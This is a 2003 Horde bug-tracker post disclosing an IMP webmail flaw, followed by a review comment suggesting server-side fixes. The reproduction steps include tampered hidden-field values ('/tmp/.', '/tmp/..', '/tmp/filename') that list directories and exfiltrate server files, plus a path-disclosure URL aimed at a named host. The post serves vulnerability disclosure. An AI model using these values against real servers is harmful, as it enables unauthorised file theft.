[bugs] [Bug 1251] New - * Folder listing and possible file or attachment theft using IMP attachments.
bugs at bugs.horde.org
Mon May 19 03:27:43 PDT 2003
http://bugs.horde.org/show_bug.cgi?id=1251
*** shadow/1251 Mon May 19 07:27:43 2003
--- shadow/1251.tmp.19555 Mon May 19 07:27:43 2003
***************
*** 0 ****
--- 1,66 ----
+ Bug#: 1251
+ Product: Horde
+ Version: 0.1 Alpha
+ Platform: PHP Code
+ OS/Version: Linux
+ Status: NEW
+ Resolution:
+ Severity: major
+ Priority: P2
+ Component: IMP
+ Area: BUILD
+ AssignedTo: chuck at horde.org
+ ReportedBy: brett.moore at security-assessment.com
+ URL:
+ Summary: * Folder listing and possible file or attachment theft using IMP attachements.
+
+ Hi, I'm unable to confirm version number at the moment. If you would like
+ I can do so and get them to you in the next coupla days.
+
+ Horde / IMP Web mail system
+
+ * Folder listing and possible file or attachment theft.
+
+ * Log in and go to the compose mail screen.
+ This will give you a valid unique email id setting and cookie
+ * Add an attachment.
+ * View the source
+ * Set the action field to the horde server
+ * Locate this section on the form
+
+ <input type="hidden" name="attachments_name[]" value="proof.txt" />
+ <input type="hidden" name="attachments_size[]" value="29" />
+ <input type="hidden" name="attachments_file[]"
+ value="/tmp/impattQxBe6y" />
+ <input type="hidden" name="attachments_type[]" value="text/plain" />
+ <input type="checkbox" name="delattachments[]"
+ value="/tmp/impattQxBe6y" />
+ * By changing this field value
+ <input type="hidden" name="attachments_file[]"
+ value="/tmp/impattQxBe6y" />
+
+ * to either
+ <input type="hidden" name="attachments_file[]" value="/tmp/." />
+
+ * or
+ <input type="hidden" name="attachments_file[]" value="/tmp/.." />
+
+ * will cause an email to be sent with directory listings of /tmp/ and the
+ directory below.
+
+ * After viewing the /tmp/ directory the filename can be specified to download
+ any file from there.
+ <input type="hidden" name="attachments_file[]" value="/tmp/filename" />
+
+
+ And a simple path disclosure, tho this too may be not directly related to
+ horde / imp.
+
+ http://vmail.visp.co.nz/horde/css.php?app=imp./
+ A fatal error has occurred:
+
+ 'imp./' is not configured in the Horde Registry.
+
+ [line 408 of /usr/local/apache/htdocs/vmail.visp.co.nz/horde/lib/Registry.php]
+
+ Details have been logged for the administrator.
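Review bot: the attachments_file[] hidden input in the reproduction steps carries the server-side temp path (/tmp/impattQxBe6y) through the client, and the report shows the server attaches whatever path comes back, so the fix belongs in the handler that builds the outgoing message rather than in filtering the /tmp/. and /tmp/.. values specifically. Suggest keeping the uploaded file's path in the server-side session and exposing only an opaque index in the form, or at minimum rejecting any submitted value that is not a regular file created by this session's upload. Separately, the Version field says 0.1 Alpha while the body says the version could not be confirmed, and Area is set to BUILD; both should be corrected once the affected Horde/IMP versions are known. The css.php error at the end also returns the full filesystem path to Registry.php to the client, which argues for a generic error page with the details kept in the administrator log only.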